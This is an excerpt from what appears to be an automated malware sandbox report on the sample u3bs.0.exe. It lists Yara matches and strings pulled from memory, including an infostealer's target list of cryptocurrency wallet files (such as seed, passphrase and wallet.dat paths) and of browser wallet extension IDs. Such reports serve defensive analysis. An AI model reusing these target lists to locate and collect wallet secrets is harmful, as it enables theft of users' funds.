                              Source: Yara matchFile source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
